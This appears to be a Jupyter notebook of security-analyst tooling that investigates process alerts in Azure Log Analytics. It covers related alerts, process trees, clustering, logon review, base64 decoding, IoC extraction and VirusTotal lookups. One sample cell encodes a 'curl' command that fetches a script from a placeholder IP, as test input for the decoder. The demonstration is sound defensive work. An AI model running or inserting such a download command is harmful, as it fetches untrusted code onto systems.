# Title: Alert Investigation (Process Alerts)
LogAnalytics
Version 0.3
## Description:
A series of modules that help you understand the contents of a process-based alert.


<a id='toc'></a>
## Table of Contents
- [Setup and Authenticate](#setup)

- [Get Alerts List](#getalertslist)
- [Choose an Alert to investigate](#enteralertid)
  - [Extract Properties and entities from alert](#extractalertproperties)
  - [Entity Graph](#entitygraph)
- [Related Alerts](#related_alerts)
- [Session Process Tree](#processtree)
  - [Process Timeline](#processtimeline)
- [Other Processes on Host](#process_clustering)
- [Check for IOCs in Commandline](#cmdlineiocs)
  - [VirusTotal lookup](#virustotallookup)
- [Alert command line - Occurrence on other hosts in workspace](#cmdlineonotherhosts)
- [Host Logons](#host_logons)
  - [Alert Account](#logonaccount)
  - [Failed Logons](#failed_logons)
- [Appendices](#appendices)
  - [Saving data to Excel](#appendices)


<a id='setup'></a>[Contents](#toc)
# Setup

1. Make sure the packages listed under Install Packages are installed (uncomment the lines and run the cell once).
2. The steps up to selecting the alert ID are manual. After that, most of the notebook can be executed sequentially.
3. Major sections should run independently (e.g. Alert command line and Host Logons can be run without running Session Process Tree).

## Install Packages
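Before uncommenting the installs below, it can help to see which modules the current kernel can already import. The following is a minimal sketch using only the standard library; the `REQUIRED_MODULES` list and the `find_missing` helper are illustrative names, and the import names are assumptions (an import name can differ from the pip/conda package name).

```python
import importlib.util

# Import names assumed for this sketch. They may differ from the package
# names used with pip/conda (for example, the attrs package imports as attr).
REQUIRED_MODULES = ["msgpack", "Kqlmagic", "requests", "attr",
                    "seaborn", "bokeh", "holoviews"]


def find_missing(modules):
    """Return the top-level module names that cannot be located."""
    missing = []
    for name in modules:
        # find_spec returns None when a top-level module is not installed
        if importlib.util.find_spec(name) is None:
            missing.append(name)
    return missing


missing = find_missing(REQUIRED_MODULES)
print("Missing modules:", missing or "none")
```

Only the modules reported as missing need their install line uncommented.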

In [None]:
# You may need these - should only need to uncomment and run once
# !pip install msgpack
# !pip install Kqlmagic --no-cache-dir  --upgrade

# !pip install PyHamcrest
# !conda install -c conda-forge python-levenshtein -y
# !conda install requests
# !conda install attrs
# !conda install seaborn
# !conda install bokeh
# !conda install holoviews

# our package
#!pip install ../python --upgrade


### Imports and Magic

In [None]:
# Imports
import sys
MIN_REQ_PYTHON = (3,6)
if sys.version_info < MIN_REQ_PYTHON:
    print('Check the Kernel->Change Kernel menu and ensure that Python 3.6')
    print('or later is selected as the active kernel.')
    sys.exit("Python %s.%s or later is required.\n" % MIN_REQ_PYTHON)

import numpy as np
from IPython import get_ipython
from IPython.display import display, HTML
import ipywidgets as widgets

import matplotlib.pyplot as plt
import seaborn as sns
import networkx as nx

import pandas as pd
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 50)
pd.set_option('display.max_colwidth', 100)

import os
module_path = os.path.abspath(os.path.join('..'))
if module_path not in sys.path:
    sys.path.append(module_path)
    
import msticpy.sectools as sectools
import msticpy.asitools as asi
import msticpy.asitools.kql as qry
import msticpy.asitools.nbdisplay as asidisp



### Select a Workspace

In [None]:
available_workspaces = {'Contoso77':'802d39e1-9d70-404d-832c-2de5e2478eda', 
                        'MSTICLinux':'06dc719f-5dad-47e9-b5af-07d84a0bda4e',
                        'ASIHuntOMSWorkspaceV4': '52b1ab41-869e-4138-9e40-2a4457f09bf0',
                        'ASIHuntOMSWorkspaceV5': '4ca7b24a-6e8f-4540-a8ce-1a80c2948c37',
                        'Rome ILDC - Detection E2E Tests Stage': '3eb61071-5dcd-4db3-94fa-0091a69b7359'}
select_ws = asi.SelectString(description='Select workspace :',
                             item_dict=available_workspaces)

select_ws.display()

In [None]:
LA_URL = 'https://ms.portal.azure.com/#blade/HubsExtension/Resources/resourceType/Microsoft.OperationalInsights%2Fworkspaces'
help_str=f'To find your workspace Id go to <a href={LA_URL}>Log Analytics</a> and look at the workspace properties.'
display(HTML(help_str))

ws_id = asi.GetEnvironmentKey(env_var='WORKSPACE_ID',
                              prompt='Log Analytics Workspace Id:')
ws_id.display()

### Authenticate to Log Analytics

In [None]:
# Use the workspace chosen in the dropdown, falling back to the manually entered Id
if not select_ws.value and not ws_id.value:
    raise ValueError('No workspace selected.')
WORKSPACE_ID = select_ws.value or ws_id.value

asi.kql.load_kql_magic()
# Use the following syntax if you are authenticating using an Azure Active Directory
# AppId and Secret
# %kql loganalytics://tenant(aad_tenant).workspace(WORKSPACE_ID).clientid(reader_client_id).clientsecret(reader_client_secret)

%kql loganalytics://code().workspace(WORKSPACE_ID)


<a id='getalertslist'></a>[Contents](#toc)
# Get Alerts List

**Note**: this is a placeholder section. We need something a bit more intelligent and flexible but that possibly belongs in another notebook. The purpose here is simply to get a list of subscriptions and alerts to test out the rest of the notebook.

In [None]:
alert_q_times = asi.QueryTime(units='day', max_before=20, before=5, max_after=1)
alert_q_times.display()

In [None]:
alert_counts = qry.list_alerts_counts(provs=[alert_q_times])
alert_list = qry.list_alerts(provs=[alert_q_times])
print(len(alert_counts), ' distinct alert types')
print(len(alert_list), ' distinct alerts')
display(HTML('<h2>Top alerts</h2>'))
alert_counts.head(20)

<a id='enteralertid'></a>[Contents](#toc)
# Choose Alert to Investigate
Select an alert from the list below, or copy a ProviderAlertId (from the list above or from another source) and paste it into the text box.

### Select alert from list

In [None]:
alert_select = asi.AlertSelector(alerts=alert_list, action=asidisp.display_alert)
alert_select.display()

### Or paste in an alert ID and fetch it
**Skip this if you selected from the above list**

In [None]:
# Allow alert to be selected
# Allow subscription to be selected
get_alert = asi.GetSingleAlert(action=asidisp.display_alert)
get_alert.display()

<a id='extractalertproperties'></a>[Contents](#toc)
## Extract properties and entities from Alert

In [None]:
# Extract entities and properties into a SecurityAlert class
if alert_select.selected_alert is None:
    sys.exit("Please select an alert before executing remaining cells.")

security_alert = asi.SecurityAlert(alert_select.selected_alert)
asidisp.display_alert(security_alert, show_entities=True)

<a id='entitygraph'></a>[Contents](#toc)
## Entity Graph

### Plot using Networkx/Matplotlib

In [None]:
# Draw the graph using Networkx/Matplotlib
%matplotlib notebook
alertentity_graph = asi.create_alert_graph(security_alert)
asidisp.draw_alert_entity_graph(alertentity_graph)

In [None]:
# from pyvis.network import Network
# import math
# # import networkx as nx
# # G = Network()
# # G.from_nx(alertentity_graph)
# import holoviews as hv
# hv.extension('bokeh')
# %opts Graph [width=900 height=900]

# %opts Graph [color_index='circle']
# %opts Graph (node_size=20 edge_line_width=1)
# %opts Graph [tools=['wheel_zoom', 'hover']]
# padding = dict(x=(-1.2, 1.2), y=(-1.2, 1.2))

# n_nodes = len(alertentity_graph.nodes)
# k = 1 / (math.sqrt(n_nodes))

# # hv_graph = hv.Graph.from_networkx(nx_graph, nx.layout.spring_layout, k=k).redim.range(**padding)
# hv_graph = hv.Graph.from_networkx(alertentity_graph, nx.layout.spring_layout, k=k).redim.range(**padding)
# labels = hv.Labels(
#         {('x', 'y'): hv_graph.nodes.array([0, 1]), 'text': hv_graph.nodes.data['name']}, ## 'label' can be an array: has to be correct size!
#         ['x', 'y'], 
#         'text').options(fontsize=8, cmap='viridis', yoffset=0.05)
# hv_graph*labels

<a id='related_alerts'></a>[Contents](#toc)
# Related Alerts
### For entities in the investigated alert

In [None]:
# set the origin time to the time of our alert
query_times = asi.QueryTime(units='day', origin_time=security_alert.TimeGenerated, 
                            max_before=28, max_after=1, before=5)
query_times.display()
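
The time widget above defines a query window around the alert. As a rough sketch of the arithmetic, assuming `before` and `after` are offsets measured in `units` from `origin_time` (the widget's real behavior is not shown in this notebook, and `query_window` is a hypothetical helper):

```python
from datetime import datetime, timedelta

# One step of each supported unit (assumed unit names for this sketch)
UNIT_STEP = {
    "minute": timedelta(minutes=1),
    "hour": timedelta(hours=1),
    "day": timedelta(days=1),
}


def query_window(origin, before, after, units="day"):
    """Return (start, end) as offsets of `before`/`after` units around origin."""
    step = UNIT_STEP[units]
    return origin - before * step, origin + after * step


origin = datetime(2019, 2, 10, 14, 30)  # illustrative alert time
start, end = query_window(origin, before=5, after=1)
print("Query from", start, "to", end)
```
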

In [None]:
related_alerts = qry.list_related_alerts(provs=[query_times, security_alert])

# Count related alerts by type for each kind of entity match
host_alert_items = related_alerts\
    .query('host_match == True')[['AlertType', 'StartTimeUtc']]\
    .groupby('AlertType').StartTimeUtc.agg('count').to_dict()
acct_alert_items = related_alerts\
    .query('acct_match == True')[['AlertType', 'StartTimeUtc']]\
    .groupby('AlertType').StartTimeUtc.agg('count').to_dict()
proc_alert_items = related_alerts\
    .query('proc_match == True')[['AlertType', 'StartTimeUtc']]\
    .groupby('AlertType').StartTimeUtc.agg('count').to_dict()

def print_related_alerts(alertDict, entityType, entityName):
    if len(alertDict) > 0:
        print('Found {} different alert types related to this {} (\'{}\')'.format(len(alertDict), entityType, entityName))
        for (k,v) in alertDict.items():
            print('    {}, Count of alerts: {}'.format(k, v))
    else:
        print('No alerts for {} entity \'{}\''.format(entityType, entityName))
        
print_related_alerts(host_alert_items, 'host', security_alert.hostname)
print_related_alerts(acct_alert_items, 'account', 
                     security_alert.primary_account.qualified_name if security_alert.primary_account
                     else None)
print_related_alerts(proc_alert_items, 'process', 
                     security_alert.primary_process.ProcessFilePath if security_alert.primary_process
                     else None)

In [None]:
# Draw a graph of this (add to entity graph)
%matplotlib notebook

print('This can be unreadable with a lot of alerts. Use the matplotlib interactive zoom')
print('control to zoom in to part of the graph.')
rel_alert_graph = asi.add_related_alerts(related_alerts=related_alerts,
                                         alertgraph=alertentity_graph)
asidisp.draw_alert_entity_graph(rel_alert_graph)

### Browse List of Related Alerts
Select an Alert to view details

In [None]:
related_alerts['CompromisedEntity'] = related_alerts['Computer']

def disp_full_alert(alert):
    global related_alert
    related_alert = asi.SecurityAlert(alert)
    asidisp.display_alert(related_alert, show_entities=True)

print('Selected alert is available as \'related_alert\' variable.')
rel_alert_select = asi.AlertSelector(alerts=related_alerts, action=disp_full_alert)
rel_alert_select.display()


<a id='processtree'></a>[Contents](#toc)
# Get Process Tree

## Set time boundaries for query

In [None]:
# set the origin time to the time of our alert
query_times = asi.QueryTime(units='minute', origin_time=security_alert.origin_time)
query_times.display()

**!!! Note - potentially long running query**

In [None]:
if security_alert.primary_process and security_alert.primary_process.ProcessId:
    process_tree = qry.get_process_tree(provs=[query_times, security_alert])

    # Print out the text view of the process tree
    asidisp.display_process_tree(process_tree)
else:
    print('This alert has no process entity. See later in the notebook to retrieve all processes')


<a id='processtimeline'></a>[Contents](#toc)
## Process Timeline

In [None]:
# Show timeline of events
asidisp.display_timeline(data=process_tree, alert=security_alert, title='Alert Process Session')

<a id='process_clustering'></a>[Contents](#toc)
# Other Processes on Host - Clustering
This section retrieves all processes on the host within the time bounds
set earlier.
We then process the output to extract a few features that convert strings
(such as the command line) into numeric scores based on delimiter patterns.
Finally we run a clustering algorithm on the process list that groups
similar (noisy) processes together and leaves unique process patterns
as single-member clusters.
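
To make the idea concrete, here is a simplified, standard-library sketch. It does not reproduce `add_process_features` or `dbcluster_events`: the feature definitions (`delimiter_count`, `path_score`) are assumptions made for illustration, and exact-match grouping on the feature tuple stands in for the distance-based clustering used in the cell below.

```python
import re
from collections import defaultdict

# Characters treated as delimiters in this sketch (an assumption)
DELIMITERS = re.compile(r"[\s\-\\/\.,\"'|&:;%$()]")


def delimiter_count(text):
    """Count delimiter characters as a rough measure of command line shape."""
    return len(DELIMITERS.findall(text))


def path_score(path):
    """Sum of character code points, so identical paths score identically."""
    return sum(ord(ch) for ch in path)


def group_processes(processes):
    """Group (path, commandline) pairs that share the same feature tuple."""
    groups = defaultdict(list)
    for path, cmdline in processes:
        key = (path_score(path.lower()), delimiter_count(cmdline))
        groups[key].append(cmdline)
    return list(groups.values())


sample = [
    (r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p"),
    (r"C:\Windows\System32\svchost.exe", "svchost.exe -k LocalService -p"),
    (r"C:\Windows\System32\cmd.exe", 'cmd.exe /c "echo hi & whoami"'),
]
for members in group_processes(sample):
    print(len(members), "x", members[0])
```

The two `svchost.exe` invocations differ only in an argument value, so they share a feature tuple and collapse into one group, while the `cmd.exe` line remains a single-member group.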

In [None]:
from msticpy.sectools.eventcluster import dbcluster_events, add_process_features

processes_on_host = qry.list_processes(provs=[query_times, security_alert])
feature_procs = add_process_features(input_frame=processes_on_host,
                                     path_separator=security_alert.path_separator)


# you might need to play around with the max_cluster_distance parameter.
# decreasing this gives more clusters.
(clus_events, _, _) = dbcluster_events(data=feature_procs,
                                       cluster_columns=['commandlineTokensFull', 
                                                        'pathScore', 
                                                        'isSystemSession'],
                                       max_cluster_distance=0.0001)
print('Number of input events:', len(feature_procs))
print('Number of clustered events:', len(clus_events))
clus_events.sort_values('TimeGenerated')

In [None]:
# Show timeline of events - all events
asidisp.display_timeline(data=processes_on_host, alert=security_alert, title='All Host Processes')

In [None]:
# Show timeline of events - clustered events
asidisp.display_timeline(data=clus_events, alert=security_alert, title='Distinct Host Processes')

<a id='cmdlineiocs'></a>[Contents](#toc)
# Check for IOCs in Commandline

In [None]:
process = security_alert.primary_process
ioc_extractor = sectools.IoCExtract()

if process:
    # if nothing is decoded this just returns the input string unchanged
    base64_dec_str, _ = sectools.b64.unpack_items(input_string=process["CommandLine"])
    if base64_dec_str and '<decoded' in base64_dec_str:
        print('Base64 encoded items found.')
        print(base64_dec_str)
        
    # any IoCs in the string?
    iocs_found = ioc_extractor.extract(base64_dec_str)
    
    if iocs_found:
        print('\nPotential IoCs found in alert process:')
        display(iocs_found)
else:
    print('Nothing to process')


In [None]:
ioc_extractor = sectools.IoCExtract()
ioc_df = ioc_extractor.extract(data=process_tree, columns=['CommandLine'], os_family=security_alert.os_family)
if len(ioc_df):
    display(HTML("<h3>IoC patterns found in process tree.</h3>"))
    display(ioc_df)

In [None]:
dec_df = sectools.b64.unpack_items(data=process_tree, column='CommandLine')
if len(dec_df) > 0:
    display(HTML("<h3>Decoded base 64 command lines</h3>"))
    display(HTML("Warning - some binary patterns may be decodable as unicode strings"))
    display(dec_df[['original_string', 'decoded_string', 'input_bytes', 'file_hashes']])

    ioc_dec_df = ioc_extractor.extract(data=dec_df, columns=['full_decoded_string'])
    if len(ioc_dec_df):
        display(HTML("<h3>IoC patterns found in base 64 decoded data</h3>"))
        display(ioc_dec_df)
        # DataFrame.append is removed in recent pandas versions; pd.concat is equivalent here
        ioc_df = pd.concat([ioc_df, ioc_dec_df], ignore_index=True)
else:
    print("No base64 encodings found.")
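
The cells above rely on `sectools.b64.unpack_items` and `IoCExtract`. As a rough picture of the general technique, and not of how those functions are implemented, the following standard-library sketch finds base64-looking substrings, decodes the ones that yield printable UTF-8 text, and searches the result with two simple patterns. The regular expressions, the helper names, and the sample command line are all assumptions for illustration.

```python
import base64
import binascii
import re

# Simplified patterns assumed for this sketch
B64_CANDIDATE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"https?://[^\s'\"<>]+")


def decode_base64_items(text):
    """Return printable strings decoded from base64-looking substrings."""
    decoded = []
    for match in B64_CANDIDATE.findall(text):
        try:
            raw = base64.b64decode(match, validate=True)
            candidate = raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not text once decoded
        if candidate.isprintable():
            decoded.append(candidate)
    return decoded


def extract_iocs(text):
    """Return IPv4 addresses and URLs found in the text."""
    return {"ipv4": IPV4.findall(text), "url": URL.findall(text)}


# Build an illustrative command line carrying an encoded payload
payload = base64.b64encode(b"curl http://203.0.113.7/a.sh").decode("ascii")
cmdline = f"example.exe --blob {payload}"
for item in decode_base64_items(cmdline):
    print(item, extract_iocs(item))
```
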

<a id='virustotallookup'></a>[Contents](#toc)
## VirusTotal Lookup

In [None]:
vt_key = asi.GetEnvironmentKey(env_var='VT_API_KEY',
                               help_str='To obtain an API key sign up here https://www.virustotal.com/',
                               prompt='VirusTotal API key:')
vt_key.display()

In [None]:
if vt_key.value:
    vt_lookup = sectools.VTLookup(vt_key.value, verbosity=2)

    print(f'{len(ioc_df)} items in input frame')
    supported_counts = {}
    for ioc_type in vt_lookup.supported_ioc_types:
        supported_counts[ioc_type] = len(ioc_df[ioc_df['IoCType'] == ioc_type])
    print('Items in each category to be submitted to VirusTotal')
    print('(Note: items are pre-filtered to remove obviously erroneous '
          'data and false positives, such as private IP addresses)')
    print(supported_counts)
    print('-' * 80)
    vt_results = vt_lookup.lookup_iocs(data=ioc_df, type_col='IoCType', src_col='Observable')
    display(vt_results)

<a id='cmdlineonotherhosts'></a>[Contents](#toc)
# Alert command line - Occurrence on other hosts in workspace

In [None]:
# set the origin time to the time of our alert
query_times = asi.QueryTime(units='day', before=5, max_before=20,
                            after=1, max_after=10,
                            origin_time=security_alert.origin_time)
query_times.display()

In [None]:
# Find the query to use
qry.list_queries()

In [None]:
# What does the query look like?
qry.query_help('list_hosts_matching_commandline')

In [None]:
# This query needs a commandline parameter, which isn't supplied
# by default from the alert,
# so extract and escape this from the process
commandline = security_alert.primary_process.CommandLine
commandline = asi.utility.escape_windows_path(commandline)
#commandline = commandline.replace('\'', '\\\'')
proc_match_in_ws = qry.list_hosts_matching_commandline(provs=[query_times, security_alert],
                                                                commandline=commandline)

# Check the results
if proc_match_in_ws is None or len(proc_match_in_ws) == 0:
    print('No processes with matching commandline found on other hosts in workspace')
    print('between', query_times.start, 'and', query_times.end)
else:
    hosts = proc_match_in_ws['Computer'].drop_duplicates().shape[0]
    processes = proc_match_in_ws.shape[0]
    print('{numprocesses} processes with matching commandline found on {numhosts} hosts in workspace'\
         .format(numprocesses=processes, numhosts=hosts))
    print('between', query_times.start, 'and', query_times.end)
    print('To examine these execute the dataframe \'{}\' in a new cell'.format('proc_match_in_ws'))
    print(proc_match_in_ws[['TimeCreatedUtc','Computer', 'NewProcessName', 'CommandLine']].head())
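
The escaping step in the cell above matters because Windows command lines contain backslashes and sometimes quotes, both of which are special inside a single-quoted KQL string literal. The sketch below shows one way such escaping can be done; `escape_for_kql` is a hypothetical helper and is not claimed to match `asi.utility.escape_windows_path`, and the query text is illustrative only.

```python
def escape_for_kql(value):
    """Escape backslashes first, then single quotes, for a quoted KQL string."""
    # Order matters: escaping quotes first would double their new backslashes
    return value.replace("\\", "\\\\").replace("'", "\\'")


cmdline = r"C:\Windows\System32\cmd.exe /c echo 'hi'"
query = f"SecurityEvent | where CommandLine == '{escape_for_kql(cmdline)}'"
print(query)
```
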
    

<a id='host_logons'></a>[Contents](#toc)
# Host Logons

<a id='logonaccount'></a>[Contents](#toc)
## Alert Logon Account

In [None]:
# set the origin time to the time of our alert
query_times = asi.QueryTime(units='day', origin_time=security_alert.origin_time,
                           before=5, after=0, max_before=20, max_after=1)
query_times.display()

In [None]:
if security_alert.primary_account:
    logon_event = qry.get_host_logon(provs=[query_times, security_alert])
    asidisp.display_logon_data(logon_event, security_alert)
else:
    print('No account entity in the source alert.')

In [None]:
host_logons = qry.list_host_logons(provs=[query_times, security_alert])

In [None]:
from msticpy.sectools.eventcluster import dbcluster_events, add_process_features, _string_score

if len(host_logons) > 0:
    logon_features = host_logons.copy()
    logon_features['AccountNum'] = host_logons.apply(lambda x: _string_score(x.Account), axis=1)
    logon_features['LogonHour'] = host_logons.apply(lambda x: x.TimeGenerated.hour, axis=1)

    # you might need to play around with the max_cluster_distance parameter.
    # decreasing this gives more clusters.
    (clus_logons, _, _) = dbcluster_events(data=logon_features, time_column='TimeGenerated',
                                           cluster_columns=['AccountNum',
                                                            'LogonType'],
                                           max_cluster_distance=0.0001)
    print('Number of input events:', len(host_logons))
    print('Number of clustered events:', len(clus_logons))
    print('\nDistinct host logon patterns:')
    # display() is needed because a bare expression inside an if block is not rendered
    display(clus_logons.sort_values('TimeGenerated'))
else:
    print('No logon events found for host.')

In [None]:
# Display logon details
asidisp.display_logon_data(clus_logons, security_alert)

In [None]:
# Show timeline of events - all events
asidisp.display_timeline(data=host_logons, 
                         alert=security_alert, 
                         source_columns=['Account', 'LogonType'],
                         title='All Host Logons')

In [None]:
# Counts of Logon types by Account
host_logons[['Account', 'LogonType', 'TimeGenerated']].groupby(['Account','LogonType']).count()

<a id='failed_logons'></a>[Contents](#toc)
## Failed Logons

In [None]:
failedLogons = qry.list_host_logon_failures(provs=[query_times, security_alert])
if failedLogons.shape[0] == 0:
    # Report the query window that was searched
    print(f'No logon failures recorded for this host between {query_times.start} and {query_times.end}')

failedLogons

<a id='appendices'></a>[Contents](#toc)
# Appendices

## Available DataFrames

In [None]:
print('List of current DataFrames in Notebook')
print('-' * 50)
current_vars = list(locals().keys())
for var_name in current_vars:
    if isinstance(locals()[var_name], pd.DataFrame) and not var_name.startswith('_'):
        print(var_name)

## Saving Data to Excel
To save the contents of a pandas DataFrame to an Excel spreadsheet
use the following syntax
```
# The context manager saves and closes the file on exit
with pd.ExcelWriter('myWorksheet.xlsx') as writer:
    my_data_frame.to_excel(writer, sheet_name='Sheet1')
```